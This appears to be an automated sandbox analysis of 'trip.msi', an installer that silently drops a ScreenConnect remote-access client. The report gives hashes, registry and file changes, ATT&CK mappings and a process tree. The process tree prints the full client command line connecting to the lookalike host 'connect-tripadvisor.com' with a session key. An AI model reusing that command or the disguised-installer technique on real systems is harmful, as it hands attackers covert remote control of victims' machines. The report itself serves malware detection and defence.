b65a47737eef140c672a03c768a9b0e98b51a3d43254b36746fe6eda96990f69

Analysis

max time kernel
1184s
max time network
1200s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
25-03-2024 14:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

trip.msi
Size

2.5MB
MD5

ecf939562331d02eace64bd8ac54b033
SHA1

3293d1c6d91f91eea211616e9365b2be9a928121
SHA256

b65a47737eef140c672a03c768a9b0e98b51a3d43254b36746fe6eda96990f69
SHA512

032c6879ea8df25b972e8bb0fc939c1f2c3aff40d74bff86a55a6c13e0235ca088cdb3e146bf546d05ff5ece2493ed4bfdcbdcd113d749c6d4f9b557043b312c
SSDEEP

49152:3wtuTLri0U9clw3W2vMPrITR8pq0GFO/E7ZIcKqvtdAoSh636PYp1g:gtuTvjUUw3W2vMMqbGoc9IES3hxPM

Score

6^/10

Malware Config

Signatures

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Drops file in Program Files directory 13 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.Core.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.WindowsBackstageShell.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.WindowsClient.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\app.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\Client.en-US.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.WindowsBackstageShell.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\Client.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\system.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.Client.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.ClientService.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.WindowsClient.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.Windows.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.ClientService.exe	msiexec.exe

Drops file in Windows directory 16 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\SourceHash{3857C70D-03D7-47D4-AF80-E94474C0AE4E}	msiexec.exe
File created	C:\Windows\Installer\e579dd6.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA00C.tmp	msiexec.exe
File created	C:\Windows\Installer\{3857C70D-03D7-47D4-AF80-E94474C0AE4E}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\Installer\e579dd6.msi	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9EA2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA137.tmp	msiexec.exe
File created	C:\Windows\Installer\wix{3857C70D-03D7-47D4-AF80-E94474C0AE4E}.SchedServiceConfig.rmi	MsiExec.exe
File created	C:\Windows\Installer\e579dd8.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\{3857C70D-03D7-47D4-AF80-E94474C0AE4E}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9EA1.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9FDC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA09A.tmp	msiexec.exe

Executes dropped EXE 2 IoCs

pid	Process
952	ScreenConnect.ClientService.exe
2504	ScreenConnect.WindowsClient.exe

Loads dropped DLL 23 IoCs

pid	Process
4164	MsiExec.exe
2332	rundll32.exe
2332	rundll32.exe
2332	rundll32.exe
2332	rundll32.exe
2332	rundll32.exe
2332	rundll32.exe
2332	rundll32.exe
3152	MsiExec.exe
3152	MsiExec.exe
3152	MsiExec.exe
500	MsiExec.exe
500	MsiExec.exe
952	ScreenConnect.ClientService.exe
952	ScreenConnect.ClientService.exe
952	ScreenConnect.ClientService.exe
952	ScreenConnect.ClientService.exe
952	ScreenConnect.ClientService.exe
952	ScreenConnect.ClientService.exe
952	ScreenConnect.ClientService.exe
952	ScreenConnect.ClientService.exe
952	ScreenConnect.ClientService.exe
952	ScreenConnect.ClientService.exe

Modifies data under HKEY_USERS 9 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1A\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	ScreenConnect.ClientService.exe

Modifies registry class 32 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FE95885AED2AF4C99DE95AD396FFB0EE	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-d99ea53d69ff0bee	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d99ea53d69ff0bee\UseOriginalUrlEncoding = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\ProductName = "ScreenConnect Client (d99ea53d69ff0bee)"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\Language = "1033"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\PackageCode = "659B838C479AA6F49870983AFB38DA1E"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\SourceList	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d99ea53d69ff0bee\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (d99ea53d69ff0bee)\\ScreenConnect.WindowsClient.exe\" \"%1\""	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\SourceList\PackageName = "trip.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\SourceList\Media\1 = ";"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\AdvertiseFlags = "388"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d99ea53d69ff0bee\URL Protocol	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-d99ea53d69ff0bee\shell\open\command	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d99ea53d69ff0bee	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D07C75837D304D74FA089E44470CEAE4\Full	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d99ea53d69ff0bee\shell\open	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d99ea53d69ff0bee\shell\open\command	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\SourceList\Media	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-d99ea53d69ff0bee\shell	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\ProductIcon = "C:\\Windows\\Installer\\{3857C70D-03D7-47D4-AF80-E94474C0AE4E}\\DefaultIcon"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D07C75837D304D74FA089E44470CEAE4	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\Version = "369500690"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D07C75837D304D74FA089E44470CEAE4\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FE95885AED2AF4C99DE95AD396FFB0EE\D07C75837D304D74FA089E44470CEAE4	msiexec.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1440	msiexec.exe
1440	msiexec.exe
952	ScreenConnect.ClientService.exe
952	ScreenConnect.ClientService.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3512	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3512	msiexec.exe
Token: SeSecurityPrivilege	1440	msiexec.exe
Token: SeCreateTokenPrivilege	3512	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3512	msiexec.exe
Token: SeLockMemoryPrivilege	3512	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3512	msiexec.exe
Token: SeMachineAccountPrivilege	3512	msiexec.exe
Token: SeTcbPrivilege	3512	msiexec.exe
Token: SeSecurityPrivilege	3512	msiexec.exe
Token: SeTakeOwnershipPrivilege	3512	msiexec.exe
Token: SeLoadDriverPrivilege	3512	msiexec.exe
Token: SeSystemProfilePrivilege	3512	msiexec.exe
Token: SeSystemtimePrivilege	3512	msiexec.exe
Token: SeProfSingleProcessPrivilege	3512	msiexec.exe
Token: SeIncBasePriorityPrivilege	3512	msiexec.exe
Token: SeCreatePagefilePrivilege	3512	msiexec.exe
Token: SeCreatePermanentPrivilege	3512	msiexec.exe
Token: SeBackupPrivilege	3512	msiexec.exe
Token: SeRestorePrivilege	3512	msiexec.exe
Token: SeShutdownPrivilege	3512	msiexec.exe
Token: SeDebugPrivilege	3512	msiexec.exe
Token: SeAuditPrivilege	3512	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3512	msiexec.exe
Token: SeChangeNotifyPrivilege	3512	msiexec.exe
Token: SeRemoteShutdownPrivilege	3512	msiexec.exe
Token: SeUndockPrivilege	3512	msiexec.exe
Token: SeSyncAgentPrivilege	3512	msiexec.exe
Token: SeEnableDelegationPrivilege	3512	msiexec.exe
Token: SeManageVolumePrivilege	3512	msiexec.exe
Token: SeImpersonatePrivilege	3512	msiexec.exe
Token: SeCreateGlobalPrivilege	3512	msiexec.exe
Token: SeCreateTokenPrivilege	3512	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3512	msiexec.exe
Token: SeLockMemoryPrivilege	3512	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3512	msiexec.exe
Token: SeMachineAccountPrivilege	3512	msiexec.exe
Token: SeTcbPrivilege	3512	msiexec.exe
Token: SeSecurityPrivilege	3512	msiexec.exe
Token: SeTakeOwnershipPrivilege	3512	msiexec.exe
Token: SeLoadDriverPrivilege	3512	msiexec.exe
Token: SeSystemProfilePrivilege	3512	msiexec.exe
Token: SeSystemtimePrivilege	3512	msiexec.exe
Token: SeProfSingleProcessPrivilege	3512	msiexec.exe
Token: SeIncBasePriorityPrivilege	3512	msiexec.exe
Token: SeCreatePagefilePrivilege	3512	msiexec.exe
Token: SeCreatePermanentPrivilege	3512	msiexec.exe
Token: SeBackupPrivilege	3512	msiexec.exe
Token: SeRestorePrivilege	3512	msiexec.exe
Token: SeShutdownPrivilege	3512	msiexec.exe
Token: SeDebugPrivilege	3512	msiexec.exe
Token: SeAuditPrivilege	3512	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3512	msiexec.exe
Token: SeChangeNotifyPrivilege	3512	msiexec.exe
Token: SeRemoteShutdownPrivilege	3512	msiexec.exe
Token: SeUndockPrivilege	3512	msiexec.exe
Token: SeSyncAgentPrivilege	3512	msiexec.exe
Token: SeEnableDelegationPrivilege	3512	msiexec.exe
Token: SeManageVolumePrivilege	3512	msiexec.exe
Token: SeImpersonatePrivilege	3512	msiexec.exe
Token: SeCreateGlobalPrivilege	3512	msiexec.exe
Token: SeCreateTokenPrivilege	3512	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3512	msiexec.exe
Token: SeLockMemoryPrivilege	3512	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3512	msiexec.exe
3512	msiexec.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 1440 wrote to memory of 4164	1440	msiexec.exe	76
PID 1440 wrote to memory of 4164	1440	msiexec.exe	76
PID 1440 wrote to memory of 4164	1440	msiexec.exe	76
PID 4164 wrote to memory of 2332	4164	MsiExec.exe	77
PID 4164 wrote to memory of 2332	4164	MsiExec.exe	77
PID 4164 wrote to memory of 2332	4164	MsiExec.exe	77
PID 1440 wrote to memory of 4688	1440	msiexec.exe	80
PID 1440 wrote to memory of 4688	1440	msiexec.exe	80
PID 1440 wrote to memory of 3152	1440	msiexec.exe	82
PID 1440 wrote to memory of 3152	1440	msiexec.exe	82
PID 1440 wrote to memory of 3152	1440	msiexec.exe	82
PID 1440 wrote to memory of 500	1440	msiexec.exe	83
PID 1440 wrote to memory of 500	1440	msiexec.exe	83
PID 1440 wrote to memory of 500	1440	msiexec.exe	83
PID 952 wrote to memory of 2504	952	ScreenConnect.ClientService.exe	85
PID 952 wrote to memory of 2504	952	ScreenConnect.ClientService.exe	85

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\trip.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3512

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1440
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 02C607FB6D3B8052EBDC2846C94C4788 C
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4164
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI761A.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240613046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    - Loads dropped DLL
    PID:2332
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:4688
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A6ADCEDDA3428BF4E4D417459ADBA16D
  2⤵
  - Loads dropped DLL
  PID:3152
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 5D5036B63ACB3382928923E000500CA3 E Global\MSI0000
  2⤵
  - Drops file in Windows directory
  - Loads dropped DLL
  PID:500

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1572

C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=connect-tripadvisor.com&p=443&s=40acc5ae-3c0a-470d-949c-fc9bf75b56a2&k=BgIAAACkAABSU0ExAAgAAAEAAQCxEP5Q5dY4dsd2WT0OF5M02NRSLwvHK%2b2gGrPnmXE%2bdjK66JHBg%2fOV974GClUfv92JP70R5rrdM5T%2f6RJhXpaPyovS5HRdSWayUDPDOuWwKTU5C2bwDJen%2be5gCJSSc5SS3NM%2bMR45m8a7Pfn%2fo3PhZxmUp60nGraMvVCU7VzZjbe6obzQ0ssurK8jh0vLGx5%2bqAnuKvpQRSTVkO8Jxn7R9WUkjXWbspN%2bvV4Zctr3RFgUv0em7Dv%2biktj7RlINLPGxSfwDCTHUggef%2bkfVFIVBGxPqiKD4yv9ZF3CHITonYLsDO99nuJOJHorUCra%2f7kb8%2fePltzQ8Q4f4kXoTHfY&t=&c=&c=&c=&c=&c=&c=&c=&c="
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:952
- C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.WindowsClient.exe" "RunRole" "c7c28609-c1c4-4568-8dd3-3b61495cd486" "User"
  2⤵
  - Executes dropped EXE
  PID:2504

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e579dd7.rbs

Filesize
212KB

MD5
1e7495f15ff0b048a41e42da95f6e606

SHA1
2c145f9236b94d0232400353f7e6197db8af5aa1

SHA256
ffefd688db435692512b0d05d46d6e5eb3bf45febd325f0926403f773b338469

SHA512
16190250d6a4717e788473a2235b71e89bffb9dc4e6bf7cb4c560fa5ce67bf2f70f36d1efbb84703bf98422ec22a189e25f6b2ccfbe56985afbf1f0a9cb98126

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\Client.en-US.resources

Filesize
42KB

MD5
20518e7d17ee442c745f09cd223f1f58

SHA1
5790c9ab42775e65107c07e44f0ec955acc3aa4d

SHA256
715cea8a7c4544691c00ee22a93cd42889e433f95786a2c509aa8ad10b3b316e

SHA512
51219703473fd9e6ab21e7629c11a5891d47920be46cca96beacb4292a131a0733acafa8c438cc6552e06db9d1089d52b8ddcf032676e9e93fd64d45daf82644

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\Client.resources

Filesize
2KB

MD5
0b47901f2c782922f034fba8e8062916

SHA1
893075f8ca04f92dbef7f6e81223e1b08e29328f

SHA256
64da2cfeacfcba97cad701da9288618bc42a20f69dd4a0fe5652ce49ef92524c

SHA512
b3db1c4ffed1dbaef5e03f4819bcba5f0a6864c26123e059b6a649911adbd380ae3aa1eb63c2397ea1ea5fc61103468b5db838080d7c7d5de848b5002c31cbd6

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.Client.dll

Filesize
174KB

MD5
53f4028f53716457d2f4ecd88153ee28

SHA1
6ba080b54774194929deb2dbeb07870de4c6fd94

SHA256
020abca409831487d12103e63236ce4e3437c11748ba21838694ab4e945a34d1

SHA512
1f09ec6ed90735a028f042b6900029c2c7696e76cb5c5b53357d0ba72dad01c5afa9cba8f8262e57d84f4d4ed252063e24e472381eba1bfabe7c0b533182984d

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.ClientService.exe

Filesize
93KB

MD5
513f2d59390eac20cb80876f92c6c079

SHA1
5e806426e48401e4c286e3de64ccbeb4555c4c16

SHA256
851211a77cb938257f5d1fed9385662f0ba0d47442108caf802f6fbc5d72ca02

SHA512
2192a700fc1ae17b05b076d28bd89b6d1d7ff2dfdeabff4f50d0d64084f8a242293cd8f8b479bf39fe1dace97c2b0548f055647134d25cae2ad5f9bf15ea6cd3

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.WindowsClient.exe

Filesize
554KB

MD5
b59554f17317dd72e51c2c81e70c3f12

SHA1
4cdb0b86d5e524a45423e78f759d4d73b156c4cd

SHA256
12296d6703a36b3386a2bd7c7c5217aa391d0defcb95e88cbf2e2527a0e5890c

SHA512
ee6e34645c3b03d2af8d1cc8fe2ee9da5b8fe8c886e2459f7cdb37a25bf5fed80b672884146df7a383f7ee8a1cb90a8873b5f826844adf3e7ce50a80924b6c76

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.WindowsClient.exe.config

Filesize
266B

MD5
728175e20ffbceb46760bb5e1112f38b

SHA1
2421add1f3c9c5ed9c80b339881d08ab10b340e3

SHA256
87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

SHA512
fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\app.config

Filesize
1KB

MD5
1807bc28da12a3ea9c5b28b4df4062ed

SHA1
16a33ed6f7dd65c10882284ee92a7f7e9f9a1bc2

SHA256
baca85c0e0ec3dfccb31f77dce14486f1eaf776e2afa18e3c6e0b44b8d8a1706

SHA512
c034565f12cf79c746fe2c19a07e85ad63504ee3f51df2ef12eacc8cf1dc88c0472726b64533810aef3267f1721ca147a94add29e414851262489a6bf7eb608c

Download Submit
C:\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\system.config

Filesize
899B

MD5
5768c08ad4422850c8ccb2df2add6c46

SHA1
2d63833344efce93991d1cf9e5aead37440ab10a

SHA256
b1ee9fd52ee6e90961687ada828c83c37f6db0b1e34bcda742dd46596f43b4ae

SHA512
e4c1c748baf6ee380ae8f3a3c652f55530b0c212e7932c97994fc2609d29cb202eea22594ad4a0471c65f9e82d48b602936168c7e5e1206deb1a1150863df4a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI761A.tmp

Filesize
1008KB

MD5
5f6ad2b5b34d0e8ad9fa9055423bca23

SHA1
9ce6f887bc287bdd0321937d190c79f58918db3b

SHA256
2a13ca204e47abc63fff05479da2ccabef97a3b9d529b15d392c1ba6de9616f5

SHA512
cb4583bc5dc9bfab8a02a221b2b5c33023aa5d1333155a320a85e57b1cd95e976ca23b0897dba180052a9101bd55bf6a49bc3f469c25e37c985c1f4d32ba7ae8

Download Submit
C:\Windows\Installer\MSI9EA2.tmp

Filesize
202KB

MD5
ba84dd4e0c1408828ccc1de09f585eda

SHA1
e8e10065d479f8f591b9885ea8487bc673301298

SHA256
3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852

SHA512
7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290

Download Submit
C:\Windows\Installer\e579dd6.msi

Filesize
1.9MB

MD5
ff104f8a425c05b57e30fbf0793e46a3

SHA1
f58b9869022db60f67e524f59c7f54267c1408b1

SHA256
6455c5a6baedb639fec8e88e389b5a5000866bf0e957265ea7d559d1db1a7d9c

SHA512
5e4e2ffc9292078c89bfd7499ad9234b1a5499ecb1ccbb9f125b37b3068f98b0d849259b02872e0d3037cd4b08ec29ee97c24e354b48806a2d7098bb0ab890a3

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

Filesize
610KB

MD5
2377193e5098e46b6a3ef54b82902a48

SHA1
91707d15330113dad71e8e085b56c3977c8ae716

SHA256
29fcfb387e0ff70848ddd5935dc8e527311df97391a2cb834dd618439a7f5121

SHA512
ccafc316bd4f74831c2effc0021040704b6843301e5c4b73b6972f462cbc5e392abc6a82be479a6b96db0363ca8b847239ea2bc78845f441afa83a4a54eedd41

Download Submit
\??\Volume{36961185-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{59a2f2da-a2b4-4165-a2b2-5463e4002e2d}_OnDiskSnapshotProp

Filesize
5KB

MD5
c3cc1c180343335218347112d4945200

SHA1
c24c9fd842c3d938014b3d466531130a6e81e13b

SHA256
40fdae0afbc68ae728c3877300baf6d189b6bd2f65bc4995228d2986eda3fdaf

SHA512
2cc2fdeade3e04b34192611f87a4c81b3e756205f855a3a861eebb9732ad5dfff2094f6914665b648db39fab221f8bc68450d50624fe2f9623e8939be0853dfc

Download Submit
\Program Files (x86)\ScreenConnect Client (d99ea53d69ff0bee)\ScreenConnect.ClientService.dll

